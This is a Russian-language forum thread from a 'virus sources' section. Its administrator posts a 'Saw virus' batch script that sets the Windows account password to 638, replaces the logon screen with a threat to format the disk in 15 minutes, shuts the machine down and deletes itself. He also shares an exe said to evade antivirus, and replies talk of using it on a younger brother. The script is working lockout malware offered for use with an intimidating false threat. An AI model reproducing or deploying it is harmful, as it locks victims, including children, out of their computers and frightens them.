Вирус-Пила (Шутка для ознакомления )

Тема в разделе "Исходники вирусов", создана пользователем X-Shar, 19 ноя 2012.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Вот на одном ресурсе, прочитал интересную статью (Источник приведу ниже):

    [​IMG]

    Что же делает вирус пила? И почему пила? Хе, хе. Все из вас наверное смотрели этот замечательный фильм. Ну так вот ближе к делу, после активации вируса и запуске компьютера, откроется окно ввода пароля. Ага значит наш вирус взял и поставил пароль на учетную запись жертвы (и ему все равно был там уже какой-то пароль, или нет) в принципе я мог на этом и остановиться, зайти в систему невозможно не узнав секретного пароля который знает только разработчик вируса – Я. Но я подумал, зачем быть таким злым и установил на фон приветствия картинку, на которой написано послание: «Ты не ценил свой компьютер юзер! Пришла пора расплачиваться за свои ошибки. На твой компьютер установлен пароль. У тебя есть шанс подобрать его отгадав загадку. Если ты справишься за 15 минут, то твой компьютер будет жить. Иначе по истечению 15 минут я его отформатирую. Время пошло! Игра началась!» и на черном фоне куча, куча всяких математических (простых) примеров и фотка клоуна – маска пилы.

    Я думаю если рядовой юзер увидит ТАКОЕ, он просто охренеет и начнет панически решать примеры, чтобы успеть за 15 минут подобрать пароль. Но на самом деле пусть он его хоть неделю подбирает файлы вирус не тронет. Все это сделано чтобы больше напугать жертву, особенно хорошо если он смотрел фильм пила. Вообще этот вирус скорее для родителей. Ваш сынок нет чтобы делать домашнее задание по математике, сидит целыми днями и играет в доту. Вы ставите на его ПК этот вирус, и ему чтобы сыграть в свою любимую игрушку придется нехило постараться напрягая мозг в математике. Но примеры я сделал очень простыми т.к. жертва все же может оказаться и молодой.

    Вирус сработает только у юзера с правами Администратора. Ну мне кажется такие права у 80% пользователей. Сейчас часто ставят сборки – а любая сборка винды дает нам права админа.

    Кстати пароль подставиться по примеру: 341+297 значит пароль у нас: 638

    А вот собственно и код:

    @echo off

    net user %username% 638

    md %systemroot%\System32\oobe\info\backgrounds

    reg add «HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background» /v OEMBackground /t reg_dword /d 1 /f

    copy /y backgroundDefault.jpg %systemdrive%\Windows\System32\oobe\info\backgrounds

    Shutdown /p /f

    del %0

    Как видно нового я нечего не открыл. Ну ладно, ладно расскажу что мы делаем: команда net user ставить на юзера пароль, чтобы узнать его имя я воспользовался переменной %username% ну и пароль 638.

    Далее идут команды для смены картинки на фон приветствия, говорить тут нечего не буду т.к. этому я посветил целую статью: Поменять экран приветствия
    Потом мы комп вырубаем, кстати про выключение я тоже писал:Выключение после включения
    И удаляем сами себя (чтобы жертва не увидела супер-пупер код вируса).

    Источник
     
    • Мне нравится Мне нравится x 4
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Для ознакомления и проверки своей защиты выкладываю екзешник:

    ВАЖНО: Антивирусы его не палят, лично у меня срабатывает только проактивка, так-что осторожно, тестить ТОЛЬКО на виртуалке !

    Пароль:111
     

    Вложения:

    • 8_saw.rar
      Размер файла
      281,6 КБ
      Просмотров:
      74
    • Мне нравится Мне нравится x 1
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    И ещё как сделать из батника exe, вот не плохая статейка того-же автора !

    Это тем, кто считает, что их антивирус никогда не пропускает, пропускает ещё как, причём любого производителя взять, поэтому ОЧЕНЬ важно своевременно обновлять как базы, так и версии антивируса !;)
     
    • Мне нравится Мне нравится x 1
  4. пердун Пользователь
    пердун
    Ответить в чате

    Первый уровень

    Регистрация:
    16.09.2013
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    не меняется фон только пароль ставится
     
  5. Maxim Next Безумец
    Maxim Next
    Ответить в чате

    Первый уровень

    Регистрация:
    09.01.2013
    Сообщения:
    61
    Симпатии:
    164
    Пол:
    Мужской
    Репа:
    +164 / 0 / -0
    Теперь я знаю как усмирить младшего брата который надоел со своей дотой.
     
    • Мне нравится Мне нравится x 1
  6. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    Не так полезен вирус как код смены пароля учетки, очень полезно если забыл пароль, сохраню себе :D
    Код:
    net user %usernameпароль
     
    • Мне нравится Мне нравится x 2

Поделиться этой страницей